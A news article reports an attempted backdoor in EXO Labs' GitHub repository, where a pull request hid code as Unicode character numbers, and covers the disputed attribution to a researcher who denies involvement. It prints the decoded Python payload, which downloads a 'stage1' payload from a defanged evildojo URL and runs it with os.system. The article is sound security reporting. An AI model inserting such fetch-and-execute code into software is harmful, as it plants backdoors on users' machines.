GitHub projects targeted with malicious commits to frame researcher

GitHub projects have been targeted with malicious commits and pull requests, in an attempt to inject backdoors into these projects.

Most recently, the GitHub repository of Exo Labs, an AI and machine learning startup, was targeted in the attack, which has left many wondering about the attacker’s true intentions.

‘Innocent looking PR’ caught injecting backdoor

On Tuesday, Alex Cheema, co-founder of EXO Labs warned everyone of an “innocent looking” code change submitted to EXO’s GitHub repository.

The pull request titled “clarify mlx requirement for deepseek models” attempted to modify the models.py Python file in the Exo’s code base by adding a sequence of numbers to it:

Backdoor attempt on @exolabs through an innocent looking PR.

Read every line of code. Stay safu. pic.twitter.com/M0WHoCF5Mu

— Alex Cheema – e/acc (@alexocheema) November 12, 2024

These are Unicode numbers, each representing a character. In other words, the plaintext Python code has been converted to its numbers-equivalent form via a simple technique employed by the user submitting the code change.

This sequence of characters, “105, 109, 112, 111, 114, 116,…” translates into the following code snippet (URL defanged for safety purposes):

import os
import urllib
import urllib.request
x = urllib.request.urlopen("hxxps://www.evildojo[.]com/stage1payload")
y = x.read()
z = y.decode("utf8")
x.close()
os.system(z)

The rather unsophisticated piece of code attempts to connect to evildojo(.)com and, as it appears, download “stage1” payload.

Had the code change been approved and merged into EXO’s official repository, which it did not, anyone using the product could end up executing code being remotely served by the URL on their system—and hence a functional backdoor implanted.

When accessed by BleepingComputer, however, the link returned a 404 (Not Found), and according to several others who tried to access the URL, no content ever existed at the location from the beginning.

Who is behind it and why?

This is where it gets tricky and there’s no conclusive answer in sight.

The commit appears to have been submitted from a GitHub user, “evildojo666,” an account that has since been deleted.

The archived page for the GitHub username and the domain evildojo(.)com point to Mike Bell, a Texas-based security researcher, ethical hacker, and software engineer who has persistently denied that he had anything to do with these commits.

Bell claims…